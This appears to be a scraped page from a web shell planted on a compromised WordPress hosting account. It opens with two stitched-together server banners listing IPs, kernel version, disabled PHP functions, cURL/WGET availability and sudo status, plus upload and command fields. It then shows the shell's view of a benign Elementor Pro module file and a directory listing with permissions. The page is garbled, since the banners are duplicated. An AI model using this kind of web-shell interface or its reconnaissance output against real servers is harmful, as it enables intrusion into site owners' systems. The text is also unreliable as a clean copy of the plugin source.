Server IP : 192.250.235.76 / Your IP : 45.90.210.12
System : Linux s2968.sgp1.stableserver.net 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
PHP Version : 8.2.29
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
1902120114081995
Server IP : 198.54.116.172 / Your IP : 216.73.216.36
System : Linux server322.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : mail
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Upload Files :
Command :
Current File : /home/sadasgfe/fashiondebate.pk/wp-content/plugins/elementor-pro/modules/checklist//module.php
<?php
namespace ElementorPro\Modules\Checklist;
use Elementor\Core\Isolation\Kit_Adapter_Interface;
use ElementorPro\Base\Module_Base;
if ( ! defined( 'ABSPATH' ) ) {
exit;
}
class Module extends Module_Base {
private $module;
private ?Wordpress_Adapter_Interface $wordpress_adapter;
private ?Kit_Adapter_Interface $kit_adapter;
public function __construct( ?Wordpress_Adapter_Interface $wordpress_adapter = null, ?Kit_Adapter_Interface $kit_adapter = null ) {
if ( ! class_exists( 'Elementor\\Modules\\Checklist\\Module' ) ) {
return;
}
$this->module = \Elementor\Modules\Checklist\Module::instance();
$this->wordpress_adapter = $wordpress_adapter;
$this->kit_adapter = $kit_adapter;
add_filter( 'elementor/checklist/steps', [ $this, 'replace_steps' ], 1 );
}
public function get_name() : string {
return 'e-checklist';
}
/**
* @param array $steps
* @return \Elementor\Modules\Checklist\Steps\Step_Base[]
*/
public function replace_steps( array $steps ) : array {
$formatted_steps = [];
foreach ( $steps as $step_id => $step ) {
if ( \Elementor\Modules\Checklist\Steps\Setup_Header::STEP_ID !== $step_id ) {
$formatted_steps[ $step_id ] = $step;
continue;
}
$header_step = new \ElementorPro\Modules\Checklist\Steps\Setup_Header( $this->module, $this->wordpress_adapter, $this->kit_adapter );
$formatted_steps[ $header_step->get_id() ] = $header_step;
}
return $formatted_steps;
}
}
Name
Size
Last Modified
Owner / Group
Permissions
Options
.. -- March 23 2025 22:40:18 sadasgfe / sadasgfe 0755 steps -- March 23 2025 22:40:18 sadasgfe / sadasgfe 0755 error_log 0.253 KB January 08 2026 20:13:37 sadasgfe / sadasgfe 0644 module.php 1.425 KB January 08 2026 20:13:34 sadasgfe / sadasgfe 0644